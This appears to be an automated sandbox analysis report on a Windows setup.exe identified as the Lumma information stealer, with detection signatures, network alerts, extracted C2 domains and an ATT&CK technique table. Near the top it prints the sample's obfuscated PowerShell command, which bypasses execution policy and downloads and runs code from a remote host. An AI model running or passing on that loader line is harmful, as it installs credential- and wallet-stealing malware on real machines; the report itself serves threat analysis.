Windows
Analysis Report
setup.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- setup.exe (PID: 5916 cmdline:
"C:\Users\ user\Deskt op\setup.e xe" MD5: 76F2E89ACE5C9B36679CE13B57C8B752) - powershell.exe (PID: 7332 cmdline:
powershell -exec byp ass [Net.s ervicepOIN TmANaGer]: :SEcURiTyP rOtoCOl = [Net.SecUr iTyprOtoco ltYPe]::tL s12; $gD=' https://df gh.online/ invoker.ph p?compName ='+$env:co mputername ; $pTSr = iWr -uRi $ gD -uSebAS IcpARsiNg -UsErAGent 'Mozilla/ 5.0 (Windo ws NT 10.0 ; Win64; x 64) AppleW ebKit/57.3 6 (KHTML, like Gecko ) Chrome/1 2.0.0.0 Sa fari/57.36 '; IEx $Pt sr.Content ; - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7340 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "fairiespar.cyou", "abruptyopsn.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "hRjzG3--ALFA"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T15:26:18.078230+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:19.141494+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:20.232927+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49742 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:21.479323+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49749 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:22.665292+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49760 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:24.288140+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49772 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:25.484416+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49779 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:30.959508+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49816 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:32.302034+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49823 | 185.161.251.21 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T15:26:18.576159+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:19.583691+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP |
2025-01-07T15:26:31.425192+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49816 | 188.114.97.3 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T15:26:18.576159+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T15:26:19.583691+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T15:26:20.821930+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49742 | 188.114.97.3 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: |
Source: | Code function: | 10_2_0307136A |
Source: | Static PE information: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | ReversingLabs: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_3_03E6CF9D | |
Source: | Code function: | 0_3_03E6CFA1 | |
Source: | Code function: | 0_3_03E6CF65 | |
Source: | Code function: | 0_3_03E6CF55 | |
Source: | Code function: | 0_3_03E6CF59 | |
Source: | Code function: | 0_3_03E6CF61 | |
Source: | Code function: | 0_3_03E6A41B | |
Source: | Code function: | 0_3_008D7C4A | |
Source: | Code function: | 0_3_008D7C4A | |
Source: | Code function: | 0_3_0086E7E9 | |
Source: | Code function: | 0_3_0086E3F9 | |
Source: | Code function: | 0_3_0086E729 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 221 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 221 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
